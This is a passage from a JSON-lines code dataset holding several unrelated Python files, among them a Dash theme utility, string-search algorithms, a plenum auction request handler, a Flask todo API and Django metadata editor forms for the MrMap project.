'float':\n                    metric_value = round(float(metric_value) * 100, 3)\n                elif needed_metrics[metric] == 'int':\n                    metric_value = int(metric_value)\n                selected_campaign_data[ad_space_id][metric] = metric_value\n\n        except Exception as err:\n            print('Error getting metrics: %s' % err)\n\n        try:\n            mrc_data = {}\n            for custom_event_id in ad_space_data[ad_space_id]['custom_event']:\n                if custom_event_id in mrc_events:\n                    metric_value = ad_space_data[ad_space_id]['custom_event'][\n                        custom_event_id]['metrics']['event']\n                    if metric_value is None:\n                        pass\n                    elif needed_custom_events[mrc_events[custom_event_id]] == 'int':\n                        metric_value = int(metric_value)\n                    mrc_data[mrc_events[custom_event_id]] = metric_value\n            mrc_vis_rate = round(100 * mrc_data['MRCViewable'] / (\n                mrc_data['MRCViewable'] + mrc_data['MRCUnviewable']), 3)\n            selected_campaign_data[ad_space_id]['mrc_visibility_rate'] = mrc_vis_rate\n        except Exception as err:\n            print('Error getting mrc data: %s' % err)\n\n    proj_camp_data_json = sorted(proj_camp_data_json, key=lambda k: k['label'])\n    context = {'dates': dates,\n               'proj_camp_data_json': json.dumps(proj_camp_data_json),\n               'selected_campaign_data': selected_campaign_data}\n    return render(req, 'mrc/data.html', context)\n    # return HttpResponse(json.dumps(selected_campaign_data))\n","sub_path":"mrc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494717321","text":"\"\"\"\nThis is a collection of shared components, utilities and data\n\n\"\"\"\n\nimport pickle\nimport pathlib\n\n\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\n\n\n# set relative path\nPATH = pathlib.Path(__file__).parent\nGALLERY_PATH = PATH.joinpath(\"./gallery\").resolve()\nDATA_PATH = PATH.joinpath(\"./data\").resolve()\n\n# This pickle file was created in dbc_template.py. It's kept in dcc.Store for use in all app pages.\nwith open(DATA_PATH.joinpath(\"dbc_graph_templates\"), \"rb\") as handle:\n    dbc_templates = pickle.load(handle)\n\n\n\ndef get_code_file(filename):\n    \"\"\"\n    :param filename: (str) file name of python file in the gallery directory\n    :return: a string to display the code with highlighting in dcc.Markdown(code)\n\n    Note: be sure to include a blank line and docstring at start of source file so 
highlighting\n    works correctly\n    \"\"\"\n    with open(GALLERY_PATH.joinpath(filename)) as f:\n        code = f.read()\n    return f\"```{code}```\"\n\n\n\n\nheader = dbc.Jumbotron(\n    [\n        html.H1(\"Dash Bootstrap Theme Explorer\", className=\"display-3\"),\n        html.P(\n            \"The easy way to see Bootstrap themes and Plotly graph templates and colors in a Dash app.\",\n            className=\"lead\",\n        ),\n        html.P(\"Your app design starts here!\", className=\" font-italic\",),\n        html.Hr(className=\"my-2\"),\n        html.Div(\n            [\n                dbc.Button(\n                    \"Theme Explorer\",\n                    color=\"primary\",\n                    outline=True,\n                    href=\"/theme_explorer\",\n                    className=\"mr-2\",\n                    size=\"sm\",\n                ),\n                dbc.Button(\n                    \"Dash Labs Explorer\",\n                    color=\"primary\",\n                    outline=True,\n                    href=\"/dash_labs\",\n                    className=\"mr-2\",\n                    size=\"sm\",\n                ),\n                dbc.Button(\n                    \"App Gallery\",\n                    id=\"app_gallery\",\n                    color=\"primary\",\n                    outline=True,\n                    href=\"/app_gallery\",\n                    className=\"mr-2\",\n                    size=\"sm\",\n                ),\n                dbc.Button(\n                    \"Cheatsheet\",\n                    id=\"cheatsheet\",\n                    color=\"primary\",\n                    outline=True,\n                    href=\"/cheatsheet\",\n                    className=\"mr-2\",\n                    size=\"sm\",\n                ),\n            ],\n            className=\"mt-2\",\n        ),\n        html.Div(id=\"blank_output\", className=\"mb-4\"),\n        dcc.Store(\"store\", data=dbc_templates),\n    ]\n)\n\n\ndash_labs_templates = [\n    \"FlatDiv\",\n    \"HtmlCard\",\n    \"DbcCard\",\n    \"DbcRow\",\n    \"DbcSidebar\",\n    \"DbcSidebarTabs\",\n]\n\nlight_themes = [\n    \"BOOTSTRAP\",\n    \"CERULEAN\",\n    \"COSMO\",\n    \"FLATLY\",\n    \"JOURNAL\",\n    \"LITERA\",\n    \"LUMEN\",\n    \"LUX\",\n    \"MATERIA\",\n    \"MINTY\",\n    \"PULSE\",\n    \"SANDSTONE\",\n    \"SIMPLEX\",\n    \"SKETCHY\",\n    \"SPACELAB\",\n    \"UNITED\",\n    \"YETI\",\n]\ndark_themes = [\n    \"CYBORG\",\n    \"DARKLY\",\n    \"SLATE\",\n    \"SOLAR\",\n    \"SUPERHERO\",\n]\n\n\ndbc_themes_url = {\n    \"BOOTSTRAP\": dbc.themes.BOOTSTRAP,\n    \"CERULEAN\": dbc.themes.CERULEAN,\n    \"COSMO\": dbc.themes.COSMO,\n    \"FLATLY\": dbc.themes.FLATLY,\n    \"JOURNAL\": dbc.themes.JOURNAL,\n    \"LITERA\": dbc.themes.LITERA,\n    \"LUMEN\": dbc.themes.LUMEN,\n    \"LUX\": dbc.themes.LUX,\n    \"MATERIA\": dbc.themes.MATERIA,\n    \"MINTY\": dbc.themes.MINTY,\n    \"PULSE\": dbc.themes.PULSE,\n    \"SANDSTONE\": dbc.themes.SANDSTONE,\n    \"SIMPLEX\": dbc.themes.SIMPLEX,\n    \"SKETCHY\": dbc.themes.SKETCHY,\n    \"SPACELAB\": dbc.themes.SPACELAB,\n    \"UNITED\": dbc.themes.UNITED,\n    \"YETI\": dbc.themes.YETI,\n    \"CYBORG\": dbc.themes.CYBORG,\n    \"DARKLY\": dbc.themes.DARKLY,\n    \"SLATE\": dbc.themes.SLATE,\n    \"SOLAR\": dbc.themes.SOLAR,\n    \"SUPERHERO\": dbc.themes.SUPERHERO,\n}\n\n\nplotly_template = [\n    \"bootstrap\",\n    \"plotly\",\n    \"ggplot2\",\n    \"seaborn\",\n    \"simple_white\",\n    \"plotly_white\",\n    \"plotly_dark\",\n    \"presentation\",\n    \"xgridoff\",\n    \"ygridoff\",\n    \"gridon\",\n    \"none\",\n]\n\ncontinuous_colors = px.colors.named_colorscales()\n\ndiscrete_colors = {\n    \"Plotly\": px.colors.qualitative.Plotly,\n    \"D3\": px.colors.qualitative.D3,\n    \"G10\": px.colors.qualitative.G10,\n    \"T10\": px.colors.qualitative.T10,\n    \"Alphabet\": px.colors.qualitative.Alphabet,\n    \"Dark24\": px.colors.qualitative.Dark24,\n    \"Light24\": px.colors.qualitative.Light24,\n    \"Set1\": px.colors.qualitative.Set1,\n    \"Pastel1\": px.colors.qualitative.Pastel1,\n    \"Dark2\": px.colors.qualitative.Dark2,\n    \"Set2\": px.colors.qualitative.Set2,\n    \"Pastel2\": px.colors.qualitative.Pastel2,\n    \"Set3\": px.colors.qualitative.Set3,\n    \"Antique\": px.colors.qualitative.Antique,\n    \"Bold\": px.colors.qualitative.Bold,\n    \"Pastel\": px.colors.qualitative.Pastel,\n    \"Safe\": px.colors.qualitative.Safe,\n    \"Vivid\": px.colors.qualitative.Vivid,\n    
\"Prism\": px.colors.qualitative.Prism,\n}\n\n\n# this is now in assets folder as a class name\ncodebox = {\n \"backgroundColor\": \"transparent\",\n \"borderStyle\": \"groove\",\n \"borderRadius\": 15,\n \"maxWidth\": 900,\n \"marginTop\": 0,\n \"marginBottom\": 20,\n}\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310974724","text":"#\n# Задание 7\n# Функция принимает три числа a, b, c.\n# Функция должна определить, существует ли треугольник с такими сторонами.\n# Eсли треугольник существует, то функция возвращает тип треугольника:\n# Equilateral triangle (равносторонний),\n# Isosceles triangle (равнобедренный),\n# Versatile triangle (разносторонний)\n# или не треугольник (Not a triangle).\n\n\ndef is_triangle(a, b, c) :\n \"\"\"\nReturn:\n0 = not a triangle\n1 = Equilateral\n2 = Isosceles\n3 = Versatile\n \"\"\"\n try:\n a = float(a)\n b = float(b)\n c = float(c)\n except (ValueError, TypeError) :\n return 0\n if a <= 0 or b <= 0 or c <= 0 :\n return 0\n if (a + b) <= c or (b + c) <= a or(c + a) <= b :\n return 0\n if a == b and b == c :\n return 1\n if a == b or b == c or c == a :\n return 2\n return 3\n# end of def\n\n\ndef type_triangle(a, b, c) :\n ttt = is_triangle(a, b, c)\n sss = \"Sides: [ \" + str(a) + \", \" + str(b) + \", \" + str(c) + \" ] Shape: \"\n if ttt == 1 :\n return sss + \"Equilateral triangle\"\n elif ttt == 2 :\n return sss + \"Isosceles triangle\"\n elif ttt == 3 :\n return sss + \"Versatile triangle\"\n else :\n return sss + \"not a triangle\"\n# end of def\n\n\n# asserts:\nprint(type_triangle(1, 1, None))\nprint(type_triangle(1, 1, \"a\"))\nprint(type_triangle(1, 1, \"0\"))\nprint(type_triangle(1, 1, \"-2\"))\nprint(type_triangle(1, 1, \"2\"))\nprint(type_triangle(1, 1, \"1.5\"))\nprint(type_triangle(1, 1, 1))\nprint(type_triangle(2, 3, 4))","sub_path":"hw03_07.py","file_name":"hw03_07.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512880021","text":"def pyat(mass):\r\n # table = [[ 1, 2, 3, 4], #10 + 1 11\r\n # [0, 5, 6, 7], #18 + 2 20\r\n # [8, 9, 10, 11], #48 + 3 51\r\n # [12, 13, 14, 15]] #54 + 4 58\r\n table = []\r\n table.append(mass[0:4])\r\n table.append(mass[4:8])\r\n table.append(mass[8:12])\r\n table.append(mass[12:16])\r\n\r\n col = -1\r\n print(table)\r\n for i,el in enumerate(table):\r\n for i in range(len(el) - 1):\r\n if el[i] > el[i + 1]:\r\n col += 1\r\n if col % 2 == 1:\r\n print(\"Не решаемая\", col)\r\n else:\r\n print(\"Решаемая\", col)\r\n\r\n\r\ndef serch_kmp(s, w):\r\n v = [0]*len(s) # нулевой массив размером len(s)\r\n n = 0\r\n k = 0\r\n \r\n koko = 0\r\n\r\n while k <= (len(s) - len(w)):\r\n koko += 1\r\n for i in range(k, len(s)):\r\n # print(len(s), len(w), \"k:\", k, \"i:\", i, \"n:\", n, koko)\r\n if w[i - k] == s[i]:\r\n n += 1\r\n v[i] = n\r\n if n == len(w):\r\n # print(v)\r\n return i - len(w) + 1\r\n else:\r\n n = 0\r\n v[i] = n\r\n k = i + 1\r\n break\r\n \r\n # print(v)\r\n return -1\r\n\r\n\r\ndef forming_d(pattern):\r\n # Формируем массив d.\r\n d = [len(pattern) for i in range(256)]\r\n new_p = pattern[::-1]\r\n \r\n for i in range(len(new_p)):\r\n if d[ord(new_p[i])] != len(new_p):\r\n continue\r\n else:\r\n d[ord(new_p[i])] = i\r\n return d\r\n \r\n \r\ndef search_bm(string, pattern):\r\n \r\n d = forming_d(pattern)\r\n # x - начало прохода по string\r\n # j - проход по 
pattern\r\n    # k - index into string\r\n    len_p = x = j = k = len(pattern)\r\n    # number of shifts\r\n    counter = 0\r\n    \r\n    while x <= len(string) and j > 0:\r\n        if pattern[j - 1] == string[k - 1]:\r\n            j -= 1\r\n            k -= 1\r\n        else:\r\n            x += d[ord(string[k - 1])]\r\n            k = x\r\n            j = len_p\r\n            counter += 1\r\n    \r\n    if j <= 0:\r\n        return \"Нашли. Число смещений равно \" + str(counter) + \".\"\r\n    else:\r\n        return \"Не нашли!\"\r\n    \r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    s = \"Love is too young to know what conscience is\"\r\n    t = \"Love is too young to know what conscience is, \\\r\n    Yet who knows not conscience is born of love? \\\r\n    Then, gentle cheater, urge not my amiss, \\\r\n    Lest guilty of my faults thy sweet self prove. \\\r\n    For, thou betraying me, I do betray \\\r\n    My nobler part to my gross body’s treason: \\\r\n    My soul doth tell my body that he may \\\r\n    Triumph in love; flesh stays no farther reason; \\\r\n    But rising at thy name doth point out thee \\\r\n    As his triumphant prize. Proud of this pride, \\\r\n    \\\r\n    He is contented thy poor drudge to be, \\\r\n    To stand in thy affairs, fall by thy side. \\\r\n    No want of conscience hold it that I call \\\r\n    Her ‘love’ for whose dear love I rise and fall.\" \r\n\r\n    w = \"fall\"\r\n    print(serch_kmp(t, w))\r\n    print()\r\n\r\n    print(\"\")\r\n    print(search_bm(t, w))\r\n    # pyat([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0])\r\n","sub_path":"Lab_3/lab_3_1.py","file_name":"lab_3_1.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44334456","text":"from common.serializers.json_serializer import JsonSerializer\nfrom plenum.common.constants import TXN_TYPE, DATA\nfrom plenum.common.exceptions import InvalidClientRequest, \\\n    UnauthorizedClientRequest\nfrom plenum.common.request import Request\nfrom plenum.common.txn_util import get_payload_data\nfrom plenum.common.types import f\nfrom plenum.server.ledger_req_handler import LedgerRequestHandler\nfrom plenum.test.plugin.demo_plugin.constants import PLACE_BID, AUCTION_END, \\\n    AUCTION_START, GET_BAL, AMOUNT\n\n\nclass AuctionReqHandler(LedgerRequestHandler):\n    write_types = {AUCTION_START, AUCTION_END, PLACE_BID}\n    query_types = {GET_BAL, }\n\n    # This is for testing, not required to have\n    STARTING_BALANCE = 1000\n\n    def __init__(self, ledger, state):\n        super().__init__(ledger, state)\n        self.auctions = {}\n        self.query_handlers = {\n            GET_BAL: self.handle_get_bal,\n        }\n\n    def get_query_response(self, request: Request):\n        return self.query_handlers[request.operation[TXN_TYPE]](request)\n\n    def handle_get_bal(self, request: Request):\n        return {**request.operation, **{\n            f.IDENTIFIER.nm: request.identifier,\n            f.REQ_ID.nm: request.reqId,\n        }}\n\n    def doStaticValidation(self, request: Request):\n        identifier, req_id, operation = request.identifier, request.reqId, request.operation\n        data = operation.get(DATA)\n        if not isinstance(data, dict):\n            msg = '{} attribute is missing or not in proper format'.format(DATA)\n            raise InvalidClientRequest(identifier, req_id, msg)\n\n        if operation.get(TXN_TYPE) == PLACE_BID:\n            amount = data.get(AMOUNT)\n            if not (isinstance(amount, (int, float)) and amount > 0):\n                msg = '{} must be present and should be a number ' \\\n                      'greater than 0'.format(amount)\n                raise InvalidClientRequest(identifier, req_id, msg)\n\n    def validate(self, req: Request):\n        operation = req.operation\n        data = operation.get(DATA)\n        if operation.get(TXN_TYPE) != AUCTION_START:\n            if 
data['id'] not in self.auctions:\n                raise UnauthorizedClientRequest(req.identifier,\n                                                req.reqId,\n                                                'unknown auction')\n        else:\n            self.auctions[data['id']] = {}\n\n    def apply(self, req: Request, cons_time: int):\n        operation = req.operation\n        data = operation.get(DATA)\n        if operation.get(TXN_TYPE) == PLACE_BID:\n            self.auctions[data['id']][req.identifier] = data[AMOUNT]\n\n        return super().apply(req, cons_time)\n\n    def updateState(self, txns, isCommitted=False):\n        for txn in txns:\n            self._updateStateWithSingleTxn(txn, isCommitted=isCommitted)\n\n    def _updateStateWithSingleTxn(self, txn, isCommitted=False):\n        # Dummy update so that state root is non empty\n        data = get_payload_data(txn)\n        for k, v in data.items():\n            self.state.set(k.encode(), JsonSerializer.dumps(v))\n","sub_path":"plenum/test/plugin/demo_plugin/auction_req_handler.py","file_name":"auction_req_handler.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"500379562","text":"import sys\nimport heapq\nimport re\nimport math\nfrom collections import deque\nfrom typing import *\nfrom math import ceil\n\ninput = sys.stdin.readline\n\nsys.setrecursionlimit(10**6)\n\n# eating peanuts\n# N peanuts on a 1-D number line\n# only M of them can be eaten\n# greedy - grab the nearest peanut just outside the current left/right range\n\n\n# put the peanuts into a check dict\n# then move left/right outward step by step?\n\ndef main():\n    N, M, E = map(int, input().split())  # e.g. of 6 peanuts, eat 3; current position is 7\n    data: List[int] = list(map(int, input().split()))\n    left, right = E, E\n\n    while M > 0:  # peanuts left to eat  # which peanut is nearest on the left? on the right?\n        # add the current left/right values,\n        data.extend([left, right])\n        data = list(set(data))\n        l_idx, r_idx = data.index(left), data.index(right)\n        if l_idx > 0:\n            l_idx -= 1\n        if r_idx < len(data)-1:\n            r_idx += 1\n        l_len, r_len = abs(left-data[l_idx]), abs(right-data[r_idx])\n        print(f\"data{data}\")\n        data = list(filter(lambda x: x != left and x != right, data))\n        # find those indices and step -1/+1 where possible\n        if l_len < r_len:  # eat the left one\n            left = data[l_idx]\n        else:\n            right = data[r_idx]\n\n        M -= 1\n    # print the distance between the two ends\n    print(abs(left-right))\n    return\n\n\nif __name__ == \"__main__\":\n    main()\n\n\"\"\"\n❌\n6 3 0\n2 4 5 8 11 12\n> 11\n\n6 3 7\n2 4 5 8 11 12\n>4\n\"\"\"\n","sub_path":"test/sm12/mainpy3.py","file_name":"mainpy3.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216637328","text":"from flask import request\nfrom flask_restful import Resource\nfrom app.models.todo import db, Todo, TodoSchema\n\ntodos_schema = TodoSchema(many=True)\ntodo_schema = TodoSchema()\n\n\nclass TodosResource(Resource):\n    def get(self):\n        todos = Todo.query.all()\n        todos = todos_schema.dump(todos).data\n        return {'status': 'success', 'data': todos}, 200\n\n    def post(self):\n        json_data = request.get_json(force=True)\n        if not json_data:\n            return {'message': 'No input data provided'}, 400\n        # Validate and deserialize input\n        data, errors = todo_schema.load(json_data)\n        if errors:\n            return errors, 422\n\n        todo = Todo.query.filter_by(title=data['title']).first()\n        if todo:\n            return {'message': 'Todo already exists'}, 400\n\n        todo = Todo(\n            title=json_data['title']\n        )\n        db.session.add(todo)\n        db.session.commit()\n\n        result = todo_schema.dump(todo).data\n\n        return {'status': 'success', 'data': result}, 201\n","sub_path":"app/todos/resources/todos.py","file_name":"todos.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"71582594","text":"\"\"\"\nAuthor: Michel Peltriaux\nOrganization: Spatial data infrastructure Rhineland-Palatinate, Germany\nContact: michel.peltriaux@vermkv.rlp.de\nCreated on: 09.07.19\n\n\"\"\"\nfrom dal import autocomplete\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.forms import ModelMultipleChoiceField, ModelForm\nfrom django.forms import BaseModelFormSet\nfrom django.forms.formsets import TOTAL_FORM_COUNT, INITIAL_FORM_COUNT\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django import forms\nfrom leaflet.forms.widgets import LeafletWidget\n\nfrom MrMap.cacher import PageCacher\nfrom MrMap.forms import MrMapConfirmForm\nfrom MrMap.messages import METADATA_IS_ORIGINAL, \\\n METADATA_RESTORING_SUCCESS, SERVICE_MD_RESTORED, SECURITY_PROXY_DEACTIVATING_NOT_ALLOWED\nfrom api.settings import API_CACHE_KEY_PREFIX\nfrom editor.helper import editor_helper\nfrom editor.tasks import async_process_securing_access\nfrom MrMap.forms import MrMapWizardForm\nfrom MrMap.widgets import BootstrapDatePickerInput\nfrom service.helper.enums import MetadataEnum, ResourceOriginEnum\nfrom service.models import Metadata, Keyword, Category, Dataset, ReferenceSystem, Licence, AllowedOperation\nfrom service.settings import ISO_19115_LANG_CHOICES\nfrom structure.models import Organization, MrMapGroup\nfrom users.helper import user_helper\nfrom django.contrib import messages\n\n\nclass MetadataEditorForm(ModelForm):\n def __init__(self, *args, **kwargs):\n # first call parent's constructor\n super(MetadataEditorForm, self).__init__(*args, **kwargs)\n\n # there's a `fields` property now\n self.fields['licence'].required = False\n self.fields['categories'].required = False\n self.fields['keywords'].required = False\n self.has_autocomplete_fields = True\n\n class Meta:\n model = Metadata\n fields = [\n \"title\",\n \"abstract\",\n \"language_code\",\n \"access_constraints\",\n \"licence\",\n \"keywords\",\n \"categories\",\n ]\n labels = {\n \"title\": _(\"Title\"),\n \"abstract\": _(\"Abstract\"),\n \"language_code\": _(\"Language Code\"),\n \"access_constraints\": _(\"Access Constraints\"),\n \"licence\": _(\"Licence\"),\n \"keywords\": _(\"Keywords\"),\n \"categories\": _(\"Categories\"),\n }\n help_texts = {\n \"title\": _(\"Edit the title.\"),\n \"abstract\": _(\"Edit the description. 
Keep it short and simple.\"),\n            \"language_code\": _(\"Edit the language in which the metadata is represented.\"),\n            \"access_constraints\": _(\"Edit the access constraints.\"),\n            \"licence\": Licence.get_descriptions_help_text(),\n            \"keywords\": \"\",  # Since keywords are handled differently, this can be empty\n            \"categories\": _(\"Select categories for this resource.\"),\n        }\n        widgets = {\n            \"categories\": autocomplete.ModelSelect2Multiple(\n                url='editor:category-autocomplete',\n                attrs={\n                    \"select2-container-css-style\": {\n                        \"height\": \"auto\",\n                    },\n                },\n            ),\n            'keywords': autocomplete.ModelSelect2Multiple(\n                url='editor:keyword-autocomplete',\n                attrs={\n                    \"data-containerCss\": {\n                        \"height\": \"3em\",\n                        \"width\": \"3em\",\n                    }\n                },\n            ),\n        }\n\n    def save(self, commit=True):\n        custom_md = super().save(commit=False)\n        if not self.instance.is_root():\n            # this is for the case that we are working on a non root element which is not allowed to change the\n            # inheritance setting for the whole service -> we act like it didn't change\n            custom_md.use_proxy_uri = self.instance.use_proxy_uri\n\n            # Furthermore we remove a possibly existing current_capability_document for this element, since the metadata\n            # might have changed!\n            self.instance.clear_cached_documents()\n\n        editor_helper.resolve_iso_metadata_links(self.instance, self)\n        editor_helper.overwrite_metadata(self.instance, custom_md, self)\n\n        # Clear page cache for API, so the changes will be visible on the next cache\n        p_cacher = PageCacher()\n        p_cacher.remove_pages(API_CACHE_KEY_PREFIX)\n\n        # todo: add last_changed_by_user field to Metadata model\n        \"\"\"\n        if self.instance.is_root():\n            parent_service = self.instance.service\n        else:\n            if self.instance.is_service_type(OGCServiceEnum.WMS):\n                parent_service = self.instance.service.parent_service\n            elif self.instance.is_service_type(OGCServiceEnum.WFS):\n                parent_service = self.instance.featuretype.parent_service\n\n        \n        #user_helper.create_group_activity(self.instance.created_by, self.requesting_user, SERVICE_MD_EDITED,\n        #                                  \"{}: {}\".format(parent_service.metadata.title, self.instance.title))\n        \"\"\"\n        custom_md.save()\n\n\nclass MetadataModelMultipleChoiceField(ModelMultipleChoiceField):\n    def label_from_instance(self, obj):\n        \"\"\"\n        we need to override this function to show the id of the metadata object,\n        so the user can differentiate the results where title is equal.\n        \"\"\"\n        return \"{} #{}\".format(obj.title, obj.id)\n\n\nclass ReferenceSystemModelMultipleChoiceField(ModelMultipleChoiceField):\n    def label_from_instance(self, obj):\n        \"\"\"\n        we need to override this function to show the prefix and code of the\n        reference system, so the user can differentiate results with equal titles.\n        \"\"\"\n        return f\"{obj.prefix}{obj.code}\"\n\n\nclass DatasetIdentificationForm(MrMapWizardForm):\n    title = forms.CharField(label=_('Title'), )\n    abstract = forms.CharField(label=_('Abstract'), )\n    language_code = forms.ChoiceField(label=_('Language'), choices=ISO_19115_LANG_CHOICES)\n    character_set_code = forms.ChoiceField(label=_('Character Encoding'), choices=Dataset.CHARACTER_SET_CHOICES)\n    date_stamp = forms.DateTimeField(label=_('Metadata creation date'),\n                                     widget=BootstrapDatePickerInput())\n    reference_system = ReferenceSystemModelMultipleChoiceField(\n        queryset=ReferenceSystem.objects.none(),\n        widget=autocomplete.ModelSelect2Multiple(\n            url='editor:reference-system-autocomplete',\n            attrs={\n                \"data-containercss\": {\n                    \"height\": \"3em\",\n                    \"width\": \"3em\",\n                }\n            }\n        ),\n        required=False, )\n\n    
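# NOTE (illustrative comment, added): the ModelSelect2Multiple widgets above point\n    # at django-autocomplete-light view names; a minimal sketch of such a view,\n    # assuming the standard dal Select2QuerySetView pattern, would be:\n    #   class ReferenceSystemAutocomplete(autocomplete.Select2QuerySetView):\n    #       def get_queryset(self):\n    #           qs = ReferenceSystem.objects.all()\n    #           if self.q:\n    #               qs = qs.filter(code__icontains=self.q)\n    #           return qs\n\n    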
additional_related_objects = MetadataModelMultipleChoiceField(\n queryset=Metadata.objects.none(),\n widget=autocomplete.ModelSelect2Multiple(\n url='editor:metadata-autocomplete',\n\n ),\n required=False, )\n\n created_by = forms.ModelChoiceField(\n label=_(\"Create with group\"),\n widget=forms.Select(attrs={'class': 'auto_submit_item'}),\n queryset=MrMapGroup.objects.none(),\n to_field_name='id',\n initial=1\n )\n\n def __init__(self, *args, **kwargs):\n super(DatasetIdentificationForm, self).__init__(has_autocomplete_fields=True,\n *args,\n **kwargs)\n\n self.fields['additional_related_objects'].queryset = user_helper.get_user(self.request).get_metadatas_as_qs(\n type=MetadataEnum.DATASET, inverse_match=True)\n self.fields['reference_system'].queryset = ReferenceSystem.objects.all()\n\n user = user_helper.get_user(request=kwargs.pop(\"request\"))\n user_groups = user.groups.filter(mrmapgroup__is_public_group=False)\n self.fields[\"created_by\"].queryset = user_groups\n self.fields[\"created_by\"].initial = user_groups.first()\n\n if self.instance_id:\n metadata = Metadata.objects.get(pk=self.instance_id)\n dataset = Dataset.objects.get(pk=metadata.dataset.id)\n self.fields['title'].initial = metadata.title\n self.fields['abstract'].initial = metadata.abstract\n self.fields['reference_system'].initial = metadata.reference_system.all()\n self.fields['date_stamp'].initial = dataset.date_stamp\n self.fields['language_code'].initial = dataset.language_code\n self.fields['character_set_code'].initial = dataset.character_set_code\n\n self.fields['additional_related_objects'].queryset = self.fields[\n 'additional_related_objects'].queryset.exclude(id=self.instance_id)\n\n exclusions = {'to_metadatas__origin': ResourceOriginEnum.CAPABILITIES.value}\n related_metadatas = metadata.get_related_metadatas(exclusions=exclusions)\n self.fields['additional_related_objects'].initial = related_metadatas\n\n\nclass DatasetClassificationForm(MrMapWizardForm):\n keywords = ModelMultipleChoiceField(\n label=_('Keywords'),\n queryset=Keyword.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(\n url='editor:keyword-autocomplete',\n attrs={\n \"data-containercss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n },\n },\n ),\n required=False, )\n categories = ModelMultipleChoiceField(\n label=_('Categories'),\n queryset=Category.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(\n url='editor:category-autocomplete',\n attrs={\n \"data-containercss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n },\n },\n ),\n required=False, )\n\n def __init__(self, *args, **kwargs):\n super(DatasetClassificationForm, self).__init__(\n has_autocomplete_fields=True,\n *args,\n **kwargs, )\n\n if self.instance_id:\n metadata = Metadata.objects.get(id=self.instance_id)\n self.fields['keywords'].initial = metadata.keywords.all()\n self.fields['categories'].initial = metadata.categories.all()\n\n\nclass DatasetLicenseConstraintsForm(MrMapWizardForm):\n licence = forms.ModelChoiceField(\n label=_('Terms of use'),\n required=False,\n queryset=Licence.objects.filter(is_active=True),\n help_text=Licence.get_descriptions_help_text()\n )\n access_constraints = forms.CharField(\n label=_('Access constraints'),\n required=False,\n widget=forms.Textarea()\n )\n\n def __init__(self, *args, **kwargs):\n super(DatasetLicenseConstraintsForm, self).__init__(*args, **kwargs)\n\n if self.instance_id:\n metadata = Metadata.objects.get(id=self.instance_id)\n self.fields['licence'].initial = metadata.licence\n 
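# (added note) when editing an existing dataset, these fields are\n            # pre-populated from the stored Metadata record\n            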
self.fields['access_constraints'].initial = metadata.access_constraints\n\n\nclass DatasetSpatialExtentForm(ModelForm):\n    bounding_geometry = forms.CharField(label=_('Bounding box'),\n                                        required=False,\n                                        widget=LeafletWidget())\n\n    class Meta:\n        model = Metadata\n        fields = ('bounding_geometry',)\n\n\nclass DatasetQualityForm(MrMapWizardForm):\n    maintenance_and_update_frequency = forms.ChoiceField(\n        label=_('Maintenance and update frequency'),\n        choices=Dataset.UPDATE_FREQUENCY_CHOICES\n    )\n    lineage_statement = forms.CharField(\n        label=_('Lineage Statement'),\n        required=False,\n        widget=forms.Textarea()\n    )\n\n    def __init__(self, *args, **kwargs):\n        super(DatasetQualityForm, self).__init__(*args, **kwargs)\n\n        if self.instance_id:\n            metadata = Metadata.objects.get(id=self.instance_id)\n            dataset = Dataset.objects.get(id=metadata.dataset.id)\n            self.fields['lineage_statement'].initial = dataset.lineage_statement\n            self.fields['maintenance_and_update_frequency'].initial = dataset.update_frequency_code\n\n\nclass DatasetResponsiblePartyForm(MrMapWizardForm):\n    organization = forms.ModelChoiceField(\n        label=_('Organization'),\n        queryset=Organization.objects.none(),\n        required=False,\n        help_text=_(\n            'Select another Organization to overwrite the original. You can select your organization and the ones you are allowed to publish for.')\n    )\n\n    def __init__(self, *args, **kwargs):\n        user = user_helper.get_user(kwargs.get(\"request\"))\n        user_groups = user.groups.all()\n        if 'instance_id' in kwargs and kwargs['instance_id'] is not None:\n            metadata = Metadata.objects.get(id=kwargs['instance_id'])\n            init_organization = Organization.objects.filter(id=metadata.contact.id)\n            organizations = Organization.objects.filter(\n                Q(is_auto_generated=False) &\n                Q(publishers__in=user_groups) |\n                Q(id=user.organization.id)\n            ) | init_organization\n        else:\n            organizations = Organization.objects.filter(\n                Q(is_auto_generated=False) &\n                Q(publishers__in=user_groups) |\n                Q(id=user.organization.id)\n            )\n\n        super(DatasetResponsiblePartyForm, self).__init__(*args, **kwargs)\n\n        self.fields['organization'].queryset = organizations\n\n\nclass RestoreDatasetMetadata(MrMapConfirmForm):\n    def __init__(self, instance, *args, **kwargs):\n        self.instance = instance\n        super(RestoreDatasetMetadata, self).__init__(*args, **kwargs)\n\n    def process_restore_dataset_metadata(self):\n        ext_auth = self.instance.get_external_authentication_object()\n\n        if not self.instance.is_custom:\n            messages.add_message(self.request, messages.INFO, METADATA_IS_ORIGINAL)\n            return HttpResponseRedirect(reverse(self.request.GET.get('current-view', 'home')), status=303)\n\n        if 